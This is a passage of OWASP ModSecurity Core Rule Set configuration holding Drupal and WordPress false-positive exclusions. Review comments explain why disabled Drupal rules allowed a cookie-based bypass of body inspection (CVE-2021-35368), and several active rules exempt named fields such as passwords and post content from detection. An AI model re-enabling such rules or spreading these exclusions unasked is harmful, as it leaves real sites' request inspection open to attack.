# [ WYSIWYG/CKEditor Assets and Upload ]
#
# Disable the unnecessary requestBodyAccess and for binary uploads
# bigger than an arbitrary limit of 31486341 bytes.
#
# Extensive checks make sure these uploads are really legitimate.
#
# NOTE(review): every condition in the disabled chains of this section
# (request method, path pattern, an argument value, the Content-Length
# header, a cookie whose name looks like a Drupal session cookie) is read
# from the request itself, so none of them shows that the request comes
# from an authenticated Drupal user. The final action,
# ctl:requestBodyAccess=Off, turns off request body access for the matching
# request, which leaves its body uninspected. Keep these rules disabled; do
# not re-enable them as an upload performance tweak.
#
# Rule 9001180 was commented out in 2021 in order to fight CVE-2021-35368.
#
#SecRule REQUEST_METHOD "@streq POST" \
#    "id:9001180,\
#    phase:1,\
#    pass,\
#    t:none,\
#    nolog,\
#    noauditlog,\
#    ver:'OWASP_CRS/3.3.0',\
#    chain"
#    SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \
#        "chain"
#        SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
#            "ctl:requestBodyAccess=Off"

# Rule 9001182 was commented out in 2021 in order to fight CVE-2021-35368.
#
#SecRule REQUEST_METHOD "@streq POST" \
#    "id:9001182,\
#    phase:1,\
#    pass,\
#    t:none,\
#    nolog,\
#    noauditlog,\
#    ver:'OWASP_CRS/3.3.0',\
#    chain"
#    SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \
#        "chain"
#        SecRule ARGS:destination "@streq admin/content/assets" \
#            "chain"
#            SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \
#                "chain"
#                SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
#                    "ctl:requestBodyAccess=Off"

# Rule 9001184 was commented out in 2021 in order to fight CVE-2021-35368.
# #SecRule REQUEST_METHOD "@streq POST" \ # "id:9001184,\ # phase:1,\ # pass,\ # t:none,\ # nolog,\ # noauditlog,\ # ver:'OWASP_CRS/3.3.0',\ # chain" # SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ # "chain" # SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ # "chain" # SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ # "chain" # SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ # "ctl:requestBodyAccess=Off" # # [ Content and Descriptions ] # # Disable the CRS completely for node bodies and other free text fields. # Other rules are disabled individually. # # Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack # Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj. # SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ "id:9001200,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ "id:9001202,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ "id:9001204,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ctl:ruleRemoveTargetById=932110;ARGS:destination,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /block/add" \ "id:9001206,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ "id:9001208,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ 
"id:9001210,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ "id:9001212,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001214,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ "id:9001216,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-DRUPAL-RULE-EXCLUSIONS" modsecurity-crs-3.3.5/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf000066400000000000000000000624321446122515100245460ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default WordPress install. # The exclusions are only active if crs_exclusions_wordpress=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # Note that the WordPress comment field itself is currently NOT excluded # from checking. The reason is that malicious content is regularly being # posted to WordPress comment forms, and there have been various cases # of XSS and even RCE vulnerabilities exploited by WordPress comments. 
SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ "id:9002000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-WORDPRESS" SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ "id:9002001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-WORDPRESS" # # -=[ WordPress Front-End ]=- # # # [ Login form ] # # User login password SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ "id:9002100,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ ver:'OWASP_CRS/3.3.5'" # Reset password SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ "id:9002120,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # # [ Comments ] # # Post comment SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ "id:9002130,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ver:'OWASP_CRS/3.3.5'" # # [ Gutenberg Editor ] # Used when a user (auto)saves a post/page with Gutenberg. 
#

# Gutenberg
# Removes ARGS:content and ARGS:json.content from every rule tagged
# OWASP_CRS. The pattern has no ^ or $ anchor, so it matches wherever the
# substring occurs in REQUEST_FILENAME, and it also matches paths that
# continue after "posts" or "pages".
SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \
    "id:9002140,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\
    ver:'OWASP_CRS/3.3.5'"

# Gutenberg via rest_route for sites without pretty permalinks
# The chain requires rest_route to be present exactly once before its value
# is compared with the route pattern (anchored at the start only).
# NOTE(review): this chain runs in phase 1, where ARGS presumably holds only
# query-string parameters because the body has not been read yet - confirm.
SecRule REQUEST_FILENAME "@endsWith /index.php" \
    "id:9002141,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule &ARGS:rest_route "@eq 1" \
        "t:none,\
        nolog,\
        chain"
        SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \
            "t:none,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content"

# Gutenberg upload image/media
# NOTE(review): 200002 and 200003 are outside the CRS id ranges used in this
# file; presumably they are the request-body parsing checks of the
# recommended ModSecurity base configuration - verify against the local
# modsecurity.conf. Removing them means those two rules do not act on
# requests whose path matches this unanchored pattern.
SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \
    "id:9002142,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveById=200002,\
    ctl:ruleRemoveById=200003,\
    ver:'OWASP_CRS/3.3.5'"

# Gutenberg upload image/media via rest_route for sites without pretty permalinks
# Same removals as 9002142, selected through a single rest_route parameter
# instead of the request path.
SecRule REQUEST_FILENAME "@endsWith /index.php" \
    "id:9002143,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule &ARGS:rest_route "@eq 1" \
        "t:none,\
        nolog,\
        chain"
        SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \
            "t:none,\
            ctl:ruleRemoveById=200002,\
            ctl:ruleRemoveById=200003"

#
# [ Live preview ]
# Used when an administrator customizes the site and previews the result
# as a normal user.
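#

# Theme select
# Example: wp_customize=on&theme=twentyfifteen&customized=
# {"old_sidebars_widgets_data":{"wp_inactive_widgets":[],
# "sidebar-1":["search-2","recent-posts-2","recent-comments-2",
# "archives-2","categories-2","meta-2"]}}&nonce=XXX&
# customize_messenger_channel=preview-0
# Applies only when no "action" parameter is present at all. The match is on
# request parameters alone; no path condition is part of this chain.
SecRule ARGS:wp_customize "@streq on" \
    "id:9002150,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule &ARGS:action "@eq 0" \
        "t:none,\
        ctl:ruleRemoveTargetById=942200;ARGS:customized,\
        ctl:ruleRemoveTargetById=942260;ARGS:customized,\
        ctl:ruleRemoveTargetById=942300;ARGS:customized,\
        ctl:ruleRemoveTargetById=942330;ARGS:customized,\
        ctl:ruleRemoveTargetById=942340;ARGS:customized,\
        ctl:ruleRemoveTargetById=942370;ARGS:customized,\
        ctl:ruleRemoveTargetById=942430;ARGS:customized,\
        ctl:ruleRemoveTargetById=942431;ARGS:customized,\
        ctl:ruleRemoveTargetById=942460;ARGS:customized"

# Appearance -> Widgets -> Live Preview
# "action" must be empty, customize_save or update-widget, and must be
# present exactly once (the count check is the last link of the chain).
SecRule ARGS:wp_customize "@streq on" \
    "id:9002160,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \
        "t:none,\
        chain"
        SecRule &ARGS:action "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetById=942200;ARGS:customized,\
            ctl:ruleRemoveTargetById=942260;ARGS:customized,\
            ctl:ruleRemoveTargetById=942300;ARGS:customized,\
            ctl:ruleRemoveTargetById=942330;ARGS:customized,\
            ctl:ruleRemoveTargetById=942340;ARGS:customized,\
            ctl:ruleRemoveTargetById=942370;ARGS:customized,\
            ctl:ruleRemoveTargetById=942430;ARGS:customized,\
            ctl:ruleRemoveTargetById=942431;ARGS:customized,\
            ctl:ruleRemoveTargetById=942460;ARGS:customized,\
            ctl:ruleRemoveTargetById=920230;ARGS:partials,\
            ctl:ruleRemoveTargetById=941320;ARGS:partials,\
            ctl:ruleRemoveTargetById=942180;ARGS:partials,\
            ctl:ruleRemoveTargetById=942200;ARGS:partials,\
            ctl:ruleRemoveTargetById=942260;ARGS:partials,\
            ctl:ruleRemoveTargetById=942330;ARGS:partials,\
            ctl:ruleRemoveTargetById=942340;ARGS:partials,\
            ctl:ruleRemoveTargetById=942370;ARGS:partials,\
            ctl:ruleRemoveTargetById=942430;ARGS:partials,\
            ctl:ruleRemoveTargetById=942431;ARGS:partials,\
            ctl:ruleRemoveTargetById=942460;ARGS:partials"

# Self calls to wp-cron.php?doing_wp_cron=[timestamp]
# These requests may be missing Accept, Content-Length headers.
# This rule must run in phase:1.
SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \
    "id:9002200,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveById=920180,\
    ctl:ruleRemoveById=920300,\
    ver:'OWASP_CRS/3.3.5'"

#
# [ Cookies ]

# WP Session Manager
# Cookie: _wp_session=[hex]||[timestamp]||[timestamp]
# detected SQLi using libinjection with fingerprint 'n&1'
# The exclusion is granted only when the cookie value has exactly the
# documented shape and the cookie is present exactly once.
SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \
    "id:9002300,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \
        "t:none,\
        ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session"


#
# -=[ WordPress Administration Back-End (wp-admin) ]=-
#

# Skip this section for performance unless /wp-admin/ is in filename
# One skip rule per phase; both jump to the END-WORDPRESS-ADMIN marker.
SecRule REQUEST_FILENAME "!@contains /wp-admin/" \
    "id:9002400,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-WORDPRESS-ADMIN"

SecRule REQUEST_FILENAME "!@contains /wp-admin/" \
    "id:9002401,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-WORDPRESS-ADMIN"

#
# [ Installation ]
#

# WordPress installation: exclude database password
# Only for step=2, with the step parameter present exactly once.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \
    "id:9002410,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:step "@streq 2" \
        "t:none,\
        chain"
        SecRule &ARGS:step "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd"

# WordPress installation: exclude admin password
# Only for step=2, with the step parameter present exactly once.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \
    "id:9002420,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:step "@streq 2" \
        "t:none,\
        chain"
        SecRule &ARGS:step "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text"

#
# [ User management ]
#

# Edit logged-in user
# URL-type profile fields are removed from rule 931130 only; the password
# fields are removed from every rule tagged OWASP_CRS.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \
    "id:9002520,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:action "@streq update" \
        "t:none,\
        chain"
        SecRule &ARGS:action "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetById=931130;ARGS:url,\
            ctl:ruleRemoveTargetById=931130;ARGS:facebook,\
            ctl:ruleRemoveTargetById=931130;ARGS:instagram,\
            ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\
            ctl:ruleRemoveTargetById=931130;ARGS:myspace,\
            ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\
            ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\
            ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\
            ctl:ruleRemoveTargetById=931130;ARGS:youtube,\
            ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"

# Edit user
# Same exclusion list as 9002520 (Edit logged-in user), for user-edit.php.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \
    "id:9002530,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:action "@streq update" \
        "t:none,\
        chain"
        SecRule &ARGS:action "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetById=931130;ARGS:url,\
            ctl:ruleRemoveTargetById=931130;ARGS:facebook,\
            ctl:ruleRemoveTargetById=931130;ARGS:instagram,\
            ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\
            ctl:ruleRemoveTargetById=931130;ARGS:myspace,\
            ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\
            ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\
            ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\
            ctl:ruleRemoveTargetById=931130;ARGS:youtube,\
            ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"

# Create user
SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \
    "id:9002540,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:action "@streq createuser" \
        "t:none,\
        chain"
        SecRule &ARGS:action "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetById=931130;ARGS:url,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"


#
# [ General exclusions ]
#

# _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages
# This SecAction has no condition of its own; it sits after skip rule
# 9002401, so it is reached only when the filename contains /wp-admin/.
# NOTE(review): 942440 is excluded for _wp_http_referer but not for
# wp_http_referer - confirm whether that difference is intended.
SecAction \
    "id:9002600,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\
    ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\
    ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\
    ver:'OWASP_CRS/3.3.5'"

#
# [ Content editing ]
#

# Edit posts and pages
# /wp-admin/post.php, /wp-admin/post.php?t=[timestamp]
# - Themes do not properly escape post_title in HTML, so beware of XSS
#   and be conservative in excluding this parameter.
# - Parameter _wp_http_referer can appear multiple times.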
SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ "id:9002700,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ ctl:ruleRemoveById=920272,\ ctl:ruleRemoveById=921180" # Autosave posts and pages # ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002710,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq heartbeat" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\ ctl:ruleRemoveById=921180,\ ctl:ruleRemoveById=920272" # Edit menus SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ "id:9002720,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\ ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data" # Edit text widgets (can contain custom HTML) 
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002730,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\ 
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]" # Reorder widgets SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002740,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq widgets-order" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]" # 
Create permalink sample for new post SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002750,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq sample-permalink" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title" # Add external link to menu SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002760,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq add-menu-item" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]" # Editor: Add Media, Insert Media, Insert into page SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002770,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq send-attachment-to-editor" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html" # # [ Options and Settings ] # # Change site URL SecRule REQUEST_FILENAME "@endsWith 